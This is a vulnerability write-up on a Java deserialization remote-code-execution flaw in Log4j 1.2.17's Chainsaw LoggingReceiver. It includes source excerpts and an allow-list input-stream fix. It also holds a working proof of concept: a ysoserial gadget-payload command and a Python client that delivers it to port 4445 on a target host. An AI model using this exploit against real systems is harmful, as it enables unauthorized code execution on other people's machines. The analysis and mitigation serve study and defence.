Log4j 1.2.17 RCE

Vulnerability discovered in early 2020.

After reading CVE-2019-17571, I found that there is another vulnerability under chainsaw: the LoggingReceiver class deserializes data read straight off a socket, and the absence of any validation of that data is what makes the vulnerability possible.

Vulnerability analysis:
The listening port is set in the setupReceiver method, at line 133 of src/main/java/org/apache/log4j/chainsaw/Main.java:

```java
private void setupReceiver(MyTableModel aModel) {
    int port = 4445;  // default Chainsaw listening port
    String strRep = System.getProperty("chainsaw.port");
    if (strRep != null) {
        try {
            port = Integer.parseInt(strRep);
        } catch (NumberFormatException var6) {
            LOG.fatal("Unable to parse chainsaw.port property with value " + strRep + ".");
            JOptionPane.showMessageDialog(this, "Unable to parse port number from '" + strRep + "', quitting.", "CHAINSAW", 0);
            System.exit(1);
        }
    }
    // ... the socket receiver is created next (following listing)
}
```

The method then hands the port to a LoggingReceiver, which accepts the incoming connections:

```java
try {
    LoggingReceiver lr = new LoggingReceiver(aModel, port);  // binds the server socket
    lr.start();                                              // accept loop runs in its own thread
} catch (IOException e) {
    // the original reports the failure and exits; not reproduced in this excerpt
}
```

Following the LoggingReceiver class, the data is read in the run method (of the inner thread that handles each accepted client): the mClient socket's input stream is wrapped directly in an ObjectInputStream, and calling readObject on that ois object is what triggers the vulnerability:
src/main/java/org/apache/log4j/chainsaw/LoggingReceiver.java

```java
public void run() {
    LoggingReceiver.LOG.debug("Starting to get data");

    try {
        // Raw, unauthenticated socket bytes wrapped in a plain ObjectInputStream:
        // no class allow-list and no filter of any kind
        ObjectInputStream ois = new ObjectInputStream(this.mClient.getInputStream());

        while(true) {
            // readObject() builds whatever object graph the remote peer described;
            // the cast to LoggingEvent only happens after that graph has been created
            LoggingEvent event = (LoggingEvent)ois.readObject();
            LoggingReceiver.this.mModel.addEvent(new EventDetails(event));
        }
    } catch (IOException e) {
        // EOF / socket errors: the original logs them and closes the connection
    } catch (ClassNotFoundException e) {
        // unknown class in the stream: logged, then the connection is closed
    }
}
```
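
What the missing verification would look like, as an added example that is not part of the original post or of log4j itself: a subclass of ObjectInputStream whose resolveClass hook refuses every class that is not on an allow-list. The hook runs before a class is loaded, so a foreign class in the stream is rejected before any of its constructors, readObject methods or static initialisers can execute. The class name SafeLoggingEventInputStream and the allow-list are assumptions made for this example (it takes a serialized LoggingEvent to contain only LoggingEvent, LocationInfo, ThrowableInformation, a Hashtable of MDC values, strings and string arrays); the demo in main assumes log4j-1.2.17.jar on the classpath.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

import org.apache.log4j.Level;
import org.apache.log4j.Logger;
import org.apache.log4j.spi.LoggingEvent;

/**
 * Hypothetical replacement for the plain ObjectInputStream in LoggingReceiver.run().
 * Every class descriptor in the stream passes through resolveClass(), which is
 * called before the class is loaded, so a non-allow-listed class aborts the read
 * before any of its code can run.
 */
public class SafeLoggingEventInputStream extends ObjectInputStream {

    // Types that legitimately occur in a serialized log4j 1.2 LoggingEvent.
    // Assumption for this example: MDC values are plain strings; an application
    // that stores other types in the MDC would have to extend this list.
    private static final Set<String> ALLOWED = Collections.unmodifiableSet(
            new HashSet<String>(Arrays.asList(
                    "org.apache.log4j.spi.LoggingEvent",
                    "org.apache.log4j.spi.LocationInfo",
                    "org.apache.log4j.spi.ThrowableInformation",
                    "java.util.Hashtable",
                    "[Ljava.lang.String;")));

    public SafeLoggingEventInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!ALLOWED.contains(name)) {
            // Refuse before loading: no constructor, readObject() or <clinit> of the class runs
            throw new InvalidClassException(name, "class not permitted in a LoggingEvent stream");
        }
        return super.resolveClass(desc);
    }

    /** Reads one event; throws InvalidClassException if the stream names anything else. */
    public static LoggingEvent readEvent(InputStream in)
            throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new SafeLoggingEventInputStream(in);
        Object o = ois.readObject();
        if (!(o instanceof LoggingEvent)) {
            throw new InvalidClassException(o.getClass().getName(), "expected LoggingEvent");
        }
        return (LoggingEvent) o;
    }

    private static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(o);
        oos.close();
        return bos.toByteArray();
    }

    // Demonstration: a genuine LoggingEvent round-trips, while a java.util.Date
    // (standing in for any class a remote peer might choose to send) is refused.
    public static void main(String[] args) throws Exception {
        LoggingEvent event = new LoggingEvent(Logger.class.getName(),
                Logger.getLogger("demo"), Level.INFO, "hello chainsaw", null);
        LoggingEvent back = readEvent(new ByteArrayInputStream(serialize(event)));
        System.out.println("accepted: " + back.getMessage());

        try {
            readEvent(new ByteArrayInputStream(serialize(new java.util.Date())));
            System.out.println("BUG: foreign class was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

On JDK 9 and later (and JDK 8 builds that backport it) the same allow-list can be expressed without subclassing, through ObjectInputFilter and ObjectInputStream.setObjectInputFilter; the resolveClass override above is shown because it works on the Java versions log4j 1.2 was built for. Either way the filter only narrows what the receiver will instantiate; it does not change the fact that the listener accepts unauthenticated connections from anyone who can reach the port.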

Vulnerability verification:
Start the Chainsaw visualization component:

```shell
java -cp log4j-1.2.17.jar org.apache.log4j.chainsaw.Main
```

Sending a payload generated by ysoserial (https://github.com/angelwhu/ysoserial) to port 4445 of the target triggers the vulnerability.

For example, first generate the malicious data exp.ser:

```shell
java -jar ysoserial.jar Jdk7u21 "calc" > exp.ser
```

Then write a Python socket client to deliver it, exp.py:

```python
#coding:utf-8
import socket

host = "172.20.10.14"  # target ip
port = 4445            # the listening port set by the component

s = socket.socket()
s.connect((host, port))
with open("exp.ser", "rb") as f:  # malicious data generated above
    payload = f.read()
s.sendall(payload)
s.close()
```

Running exp.py triggers the vulnerability.

Alternatively, a minimal demo that starts Chainsaw from application code:

```java
import org.apache.log4j.chainsaw.Main;

public class Log4jVul {
    public static void main(String[] args) {
        String[] arg = {};
        Main.main(arg);  // starts the Chainsaw GUI and its LoggingReceiver on port 4445
    }
}
```

When you run the above demo, you will see output like:

```text
[main] DEBUG org.apache.log4j.chainsaw.MyTableModel - Total time [ms]: 1 in update, size: 0
[Thread-4] INFO org.apache.log4j.chainsaw.LoggingReceiver - Thread started
[Thread-4] DEBUG org.apache.log4j.chainsaw.LoggingReceiver - Waiting for a connection
```

The receiver reports that it is waiting for a connection; at this point, sending malicious serialized data to port 4445 triggers the vulnerability.


Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.